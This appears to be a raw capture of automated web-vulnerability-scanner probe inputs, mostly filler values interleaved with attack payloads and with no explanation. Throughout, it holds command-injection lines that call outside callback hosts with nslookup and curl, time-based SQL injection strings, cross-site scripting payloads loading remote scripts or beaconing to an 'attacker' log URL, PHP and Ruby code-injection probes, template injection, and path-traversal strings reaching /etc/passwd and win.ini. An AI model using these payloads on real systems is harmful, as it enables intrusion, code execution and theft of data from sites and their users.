|(nslookup${IFS}-q${IFS}cname${IFS}hithgthnwfily47908.bxss.me||curl${IFS}hithgthnwfily47908.bxss.me)
".gethostbyname(lc("hitxh"."sfmwcdipea469.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(67).chr(113).chr(85)."
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitkkdgsyfeafed222.bxss.me||curl${IFS}hitkkdgsyfeafed222.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitkkdgsyfeafed222.bxss.me||curl${IFS}hitkkdgsyfeafed222.bxss.me)&`'
gethostbyname(lc('hitnc'.'yqryqfme35513.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(83).chr(109).chr(69)
555
555
HttP://bxss.me/t/xss.html?%00
555
555
555
bxss.me/t/xss.html?%00
555
'"()
555
555
555
555'&&sleep(27*1000)*ukjbgl&&'
555
555
555
"+"A".concat(70-3).concat(22*4).concat(100).concat(84).concat(99).concat(68)+(require"socket"
Socket.gethostbyname("hitee"+"rqitrnjc8ca28.bxss.me.")[3].to_s)+"
555"&&sleep(27*1000)*esidxx&&"
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
'+'A'.concat(70-3).concat(22*4).concat(120).concat(89).concat(121).concat(75)+(require'socket'
Socket.gethostbyname('hital'+'rrgapmvqdcf07.bxss.me.')[3].to_s)+'
555'||sleep(27*1000)*hzguup||'
NewsCommentAdd
555
';print(md5(31337));$a='
'A'.concat(70-3).concat(22*4).concat(109).concat(86).concat(97).concat(73)+(require'socket'
Socket.gethostbyname('hitne'+'dvyzpenue0eb3.bxss.me.')[3].to_s)
555"||sleep(27*1000)*gdnoqm||"
555
555
";print(md5(31337));$a="
555
NewsCommentAdd/.
555
555
555
${@print(md5(31337))}
555
555
555
555
${@print(md5(31337))}\
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'.print(md5(31337)).'
555
555
555
555
555
555
xfs.bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
555
555
555
555
555
<!--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >51MN(9384)</ScRiPt>
555
555
555
555
555
'"()&%<zzz><ScRiPt >51MN(9072)</ScRiPt>
555
555
555
555
555
555
555
5559790750
555
555
555
555
555
555
555
555
bfg2978<s1﹥s2ʺs3ʹhjl2978
555
555
555
555
bfgx5535%C0%BEz1%C0%BCz2a%90bcxhjl5535
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >51MN(9117)</ScRiPt>
555<WWKKLA>9VSNP[!+!]</WWKKLA>
555<script>51MN(9686)</script>
555<script>51MN(9686)</script>9686
555<ScR<ScRiPt>IpT>51MN(9841)</sCr<ScRiPt>IpT>
555<ScRiPt
>51MN(9361)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9237></ScRiPt>
555<isindex type=image src=1 onerror=51MN(9717)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9056'>
555<body onload=51MN(9729)>
555<img src=//xss.bxss.me/t/dot.gif onload=51MN(9437)>
555<img src=xyz OnErRor=51MN(9396)>
555<img/src=">" onerror=alert(9839)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%35%31%4D%4E%289783%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\51MN(9914)\u003C/sCripT\u003E
555<ScRiPt>51MN(9248)</sCripT>
%F6<img zzz onmouseover=51MN(93901) //%F6>
555<input autofocus onfocus=51MN(9927)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(51MN(9695))}
5554zbqC
<ScRiPt >51MN(9616)</ScRiPt>
555<WEX1N2>ZR8JQ[!+!]</WEX1N2>
555<ifRAme sRc=9085.com></IfRamE>
555<awStMGj x=9725>
555<img sRc='http://attacker-9627/log.php?
555<aqJpa25<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+251-251-1=0+0+0+1 --
-1 OR 2+218-218-1=0+0+0+1
-1' OR 2+274-274-1=0+0+0+1 --
-1' OR 2+437-437-1=0+0+0+1 or 'JE3gvuZX'='
-1" OR 2+899-899-1=0+0+0+1 --
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555Bvi5uWMA'; waitfor delay '0:0:15' --
5554vaBm87x'); waitfor delay '0:0:15' --
5554FtPsfUn')); waitfor delay '0:0:15' --
555-1 OR 814=(SELECT 814 FROM PG_SLEEP(15))--
555-1) OR 731=(SELECT 731 FROM PG_SLEEP(15))--
555-1)) OR 517=(SELECT 517 FROM PG_SLEEP(15))--
555hc2V1sCf' OR 732=(SELECT 732 FROM PG_SLEEP(15))--
555o2TUKLNW') OR 47=(SELECT 47 FROM PG_SLEEP(15))--
5559guVDKTy')) OR 625=(SELECT 625 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@qYe8K
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >XATH(9780)</ScRiPt>
555
'"()&%<zzz><ScRiPt >XATH(9743)</ScRiPt>
555
5559006956
555
bfg10626<s1﹥s2ʺs3ʹhjl10626
bfgx7090%C0%BEz1%C0%BCz2a%90bcxhjl7090
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
555
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >XATH(9069)</ScRiPt>
555
555<WHDT8F>LWPE0[!+!]</WHDT8F>
555
555
555<script>XATH(9972)</script>
555<script>XATH(9667)</script>9667
555
555<ScR<ScRiPt>IpT>XATH(9091)</sCr<ScRiPt>IpT>
555<ScRiPt
>XATH(9958)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9499></ScRiPt>
555
555
555<isindex type=image src=1 onerror=XATH(9982)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9308'>
555<body onload=XATH(9948)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=XATH(9330)>
555<img src=xyz OnErRor=XATH(9790)>
555
555<img/src=">" onerror=alert(9921)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%58%41%54%48%289848%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\XATH(9851)\u003C/sCripT\u003E
555
555<ScRiPt>XATH(9122)</sCripT>
555
%F6<img zzz onmouseover=XATH(94241) //%F6>
555
555<input autofocus onfocus=XATH(9655)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(XATH(9652))}
555
555BPai3
<ScRiPt >XATH(9961)</ScRiPt>
555
555<WVBYM7>KEJCM[!+!]</WVBYM7>
555
555<ifRAme sRc=9739.com></IfRamE>
555
555
555<aGpaQ3x x=9281>
555
555<img sRc='http://attacker-9367/log.php?
555
555<atOA0kL<
555
555
555
555'"()&%<zzz><ScRiPt >tu38(9524)</ScRiPt>
555
'"()&%<zzz><ScRiPt >tu38(9939)</ScRiPt>
555
5559601227
555
555
bfg3828<s1﹥s2ʺs3ʹhjl3828
bfgx1995%C0%BEz1%C0%BCz2a%90bcxhjl1995
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >tu38(9289)</ScRiPt>
555
555<WUPZAW>VYYD0[!+!]</WUPZAW>
555
555<script>tu38(9413)</script>
555
555
555<script>tu38(9505)</script>9505
555<ScR<ScRiPt>IpT>tu38(9862)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>tu38(9081)</ScRiPt>
555
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9307></ScRiPt>
555
555<isindex type=image src=1 onerror=tu38(9838)>
555
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9458'>
555
555<body onload=tu38(9307)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=tu38(9527)>
555
555<img src=xyz OnErRor=tu38(9441)>
555
555<img/src=">" onerror=alert(9703)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%74%75%33%38%289086%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\tu38(9380)\u003C/sCripT\u003E
555
555<ScRiPt>tu38(9949)</sCripT>
555
%F6<img zzz onmouseover=tu38(94331) //%F6>
555
555<input autofocus onfocus=tu38(9402)>
555
<a HrEF=http://xss.bxss.me></a>
555
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(tu38(9507))}
555
5558Rq3M
<ScRiPt >tu38(9395)</ScRiPt>
555
555<W7FKID>M5XC4[!+!]</W7FKID>
555
555<ifRAme sRc=9259.com></IfRamE>
555
555<ak0wVdn x=9446>
555<img sRc='http://attacker-9144/log.php?
555<aJFxB9U<
555
555
1pYXheMiO
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555<esi:include src="http://bxss.me/rpb.png"/>
${9999532+9999222}
555
response.write(9733081*9532811)
555
555
555
'+response.write(9733081*9532811)+'
555
555
555
'.gethostbyname(lc('hitld'.'dfyrwihz49739.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(71).chr(103).chr(70).'
555
)
"+response.write(9733081*9532811)+"
../../../../../../../../../../../../../../etc/passwd
HttP://bxss.me/t/xss.html?%00
".gethostbyname(lc("hitjf"."vugvigzredfa8.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(65).chr(108).chr(66)."
555
"+"A".concat(70-3).concat(22*4).concat(122).concat(67).concat(111).concat(80)+(require"socket"
Socket.gethostbyname("hitxa"+"ktucmnzre321b.bxss.me.")[3].to_s)+"
!(()&&!|*|*|
555
../../../../../../../../../../../../../../windows/win.ini
xfs.bxss.me
bxss.me/t/xss.html?%00
555
file:///etc/passwd
^(#$!@#$)(()))******
555
'+'A'.concat(70-3).concat(22*4).concat(104).concat(65).concat(113).concat(70)+(require'socket'
Socket.gethostbyname('hitkc'+'yteleaue17641.bxss.me.')[3].to_s)+'
555
555
555
555
555
555
'"
555
../555
NewsCommentAdd
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
<!--
555
555
555
555
555
';print(md5(31337));$a='
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
NewsCommentAdd/.
555
";print(md5(31337));$a="
555
555
555
555
555
echo vvvarj$()\ fjvoei\nz^xyu||a #' &echo vvvarj$()\ fjvoei\nz^xyu||a #|" &echo vvvarj$()\ fjvoei\nz^xyu||a #
${@print(md5(31337))}
555
Http://bxss.me/t/fit.txt
&echo crrnee$()\ fpcjxq\nz^xyu||a #' &echo crrnee$()\ fpcjxq\nz^xyu||a #|" &echo crrnee$()\ fpcjxq\nz^xyu||a #
555
555&echo guzneh$()\ hehvnx\nz^xyu||a #' &echo guzneh$()\ hehvnx\nz^xyu||a #|" &echo guzneh$()\ hehvnx\nz^xyu||a #
555
555
555
http://bxss.me/t/fit.txt?.jpg
${@print(md5(31337))}\
555'"()&%<zzz><ScRiPt >8bXv(9729)</ScRiPt>
555
555
|echo plugch$()\ bgqree\nz^xyu||a #' |echo plugch$()\ bgqree\nz^xyu||a #|" |echo plugch$()\ bgqree\nz^xyu||a #
555
/etc/shells
'.print(md5(31337)).'
555
555|echo kvophu$()\ ezsvve\nz^xyu||a #' |echo kvophu$()\ ezsvve\nz^xyu||a #|" |echo kvophu$()\ ezsvve\nz^xyu||a #
555
555
555
c:/windows/win.ini
555
(nslookup -q=cname hityguugogoqz8bdc8.bxss.me||curl hityguugogoqz8bdc8.bxss.me))
'"()&%<zzz><ScRiPt >8bXv(9742)</ScRiPt>
$(nslookup -q=cname hitdwhuwkybtydd7b4.bxss.me||curl hitdwhuwkybtydd7b4.bxss.me)
'"()
555
555
555
555
&nslookup -q=cname hitkuirwruajf945e1.bxss.me&'\"`0&nslookup -q=cname hitkuirwruajf945e1.bxss.me&`'
bxss.me
555
555'&&sleep(27*1000)*mfwybr&&'
555
555
555
5559322291
&(nslookup -q=cname hitrsbnimkctn20d9c.bxss.me||curl hitrsbnimkctn20d9c.bxss.me)&'\"`0&(nslookup -q=cname hitrsbnimkctn20d9c.bxss.me||curl hitrsbnimkctn20d9c.bxss.me)&`'
555"&&sleep(27*1000)*vttzbm&&"
555
|(nslookup -q=cname hitvtypsprulx3c690.bxss.me||curl hitvtypsprulx3c690.bxss.me)
555'||sleep(27*1000)*vfimbw||'
555
`(nslookup -q=cname hitbvurlnkilxd229e.bxss.me||curl hitbvurlnkilxd229e.bxss.me)`
555
555
555"||sleep(27*1000)*jlfhae||"
;(nslookup -q=cname hitbgtdsgjhvf6165b.bxss.me||curl hitbgtdsgjhvf6165b.bxss.me)|(nslookup -q=cname hitbgtdsgjhvf6165b.bxss.me||curl hitbgtdsgjhvf6165b.bxss.me)&(nslookup -q=cname hitbgtdsgjhvf6165b.bxss.me||curl hitbgtdsgjhvf6165b.bxss.me)
555
555
555
555
555
555
555
555
bfg8189<s1﹥s2ʺs3ʹhjl8189
555
555
555
555
555
555
555
555
bfgx6163%C0%BEz1%C0%BCz2a%90bcxhjl6163
555
555
555
555
555
555
555
555
555
555
555
555
<%={{={@{#{${dfb}}%>
555
555
-1 OR 2+814-814-1=0+0+0+1 --
<th:t="${dfb}#foreach
555
555
555
555
555
-1 OR 2+357-357-1=0+0+0+1
-1' OR 2+508-508-1=0+0+0+1 --
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
-1' OR 2+701-701-1=0+0+0+1 or 'HswhLuPS'='
555
555
-1" OR 2+777-777-1=0+0+0+1 --
555
555*if(now()=sysdate(),sleep(15),0)
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
dfb{{98991*97996}}xca
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555-1; waitfor delay '0:0:15' --
555
dfb[[${98991*97996}]]xca
555-1); waitfor delay '0:0:15' --
555
555-1)); waitfor delay '0:0:15' --
555
dfb__${98991*97996}__::.x
555-1 waitfor delay '0:0:15' --
555
555Qsqyj6G6'; waitfor delay '0:0:15' --
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555d5gHEsru'); waitfor delay '0:0:15' --
555
555
555<ScRiPt >8bXv(9009)</ScRiPt>
5558nQHoHXM')); waitfor delay '0:0:15' --
555
555
555
555
555<WHNOFV>DCMLG[!+!]</WHNOFV>
555
555
555-1 OR 32=(SELECT 32 FROM PG_SLEEP(15))--
555
555
555
555<script>8bXv(9235)</script>
555-1) OR 380=(SELECT 380 FROM PG_SLEEP(15))--
555
555<script>8bXv(9712)</script>9712
555-1)) OR 753=(SELECT 753 FROM PG_SLEEP(15))--
555
555ZCBL0qNO' OR 656=(SELECT 656 FROM PG_SLEEP(15))--
555
555<ScR<ScRiPt>IpT>8bXv(9001)</sCr<ScRiPt>IpT>
55576CGq1JD') OR 516=(SELECT 516 FROM PG_SLEEP(15))--
555
555lNqmVhn2')) OR 645=(SELECT 645 FROM PG_SLEEP(15))--
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555<ScRiPt
>8bXv(9092)</ScRiPt>
555
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9959></ScRiPt>
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@VLtyp
555
555<isindex type=image src=1 onerror=8bXv(9021)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9692'>
555
555
555<body onload=8bXv(9704)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=8bXv(9770)>
555
555
555<img src=xyz OnErRor=8bXv(9765)>
555<img/src=">" onerror=alert(9507)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%38%62%58%76%289428%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\8bXv(9306)\u003C/sCripT\u003E
555
555<ScRiPt>8bXv(9498)</sCripT>
%F6<img zzz onmouseover=8bXv(99891) //%F6>
555
555<input autofocus onfocus=8bXv(9724)>
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(8bXv(9861))}
555
555UT00t
<ScRiPt >8bXv(9976)</ScRiPt>
555
555<WYUHDT>LQIHX[!+!]</WYUHDT>
555<ifRAme sRc=9867.com></IfRamE>
555
555<aVDabkx x=9610>
555
555<img sRc='http://attacker-9439/log.php?
555<aU7Zhok<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >CBwk(9002)</ScRiPt>
'"()&%<zzz><ScRiPt >CBwk(9696)</ScRiPt>
555
5559901934
555
555
bfg8757<s1﹥s2ʺs3ʹhjl8757
bfgx8754%C0%BEz1%C0%BCz2a%90bcxhjl8754
555
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >CBwk(9371)</ScRiPt>
555
555
555<WCZUT1>2AAYC[!+!]</WCZUT1>
555<script>CBwk(9392)</script>
555
555<script>CBwk(9540)</script>9540
555
555<ScR<ScRiPt>IpT>CBwk(9703)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>CBwk(9651)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9231></ScRiPt>
555
555
555
555<isindex type=image src=1 onerror=CBwk(9044)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9561'>
555<body onload=CBwk(9978)>
555<img src=//xss.bxss.me/t/dot.gif onload=CBwk(9642)>
555
555<img src=xyz OnErRor=CBwk(9680)>
555
555<img/src=">" onerror=alert(9556)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%43%42%77%6B%289767%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\CBwk(9732)\u003C/sCripT\u003E
555
555<ScRiPt>CBwk(9567)</sCripT>
555
%F6<img zzz onmouseover=CBwk(99631) //%F6>
555<input autofocus onfocus=CBwk(9947)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(CBwk(9603))}
555
555k30no
<ScRiPt >CBwk(9489)</ScRiPt>
555
555<WHWTUB>T3F2V[!+!]</WHWTUB>
555
555<ifRAme sRc=9978.com></IfRamE>
555
555<aTG54XZ x=9954>
555<img sRc='http://attacker-9859/log.php?
555
555<aljzShP<
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >Tbtp(9076)</ScRiPt>
555
'"()&%<zzz><ScRiPt >Tbtp(9287)</ScRiPt>
555
5559907446
555
555
555
1
1